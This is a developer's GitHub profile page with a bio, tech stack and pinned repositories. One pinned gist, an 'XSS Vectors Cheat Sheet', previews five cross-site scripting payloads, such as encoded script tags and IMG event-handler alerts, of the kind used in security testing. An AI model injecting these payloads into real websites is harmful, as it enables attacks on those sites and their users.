Skip to content
View 4nemfreddo's full-sized avatar
πŸ˜„
πŸ˜„

Block or report 4nemfreddo

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don’t include any personal information such as legal names or email addresses. Markdown is supported. This note will only be visible to you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
4nemfreddo/README.md

πŸ’« Hi, I’m Freddie!

πŸ‘‹ Welcome to my GitHub!
I’m a Software Developer passionate about building scalable web applications and cloud-based solutions.

πŸš€ What I’m Working On

  • Collaborating on web applications, data and cloud-based information security projects.
  • Expanding my portfolio with Platform-as-a-Service (PaaS) and Software-as-a-Service (SaaS) solutions.

🌱 Current Focus

  • Enhancing my AWS expertise to create robust, cloud-native solutions.
  • Diving deeper into Data Engineering.

πŸ’¬ Ask Me About

  • Designing custom software and cloud architectures for your projects.

⚑ Fun Fact

T H E W O R L D I S Y O U R S. 🌍


Feel free to fork a project or connect with me here. Let’s build something amazing together!

🌐 Socials:

LinkedIn Medium

πŸ’» Tech Stack:

HTML5 Shell Script TypeScript Windows Terminal AWS Google Cloud GithubPages JWT Next JS NodeJS React SASS TailwindCSS Vite WordPress MongoDB JavaScript

Pinned Loading

  1. freddo-portfolio freddo-portfolio Public

    TypeScript

  2. movie-app movie-app Public

    JavaScript

  3. subscription-tracker subscription-tracker Public

    JavaScript

  4. SalesFlow SalesFlow Public

    Blade

  5. wordlists wordlists Public

    Forked from assetnote/wordlists

    Automated & Manual Wordlists provided by Assetnote

    CSS

  6. XSS Vectors Cheat Sheet XSS Vectors Cheat Sheet
    1
    %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
    2
    <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
    3
    <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
    4
    <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
    5
    <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">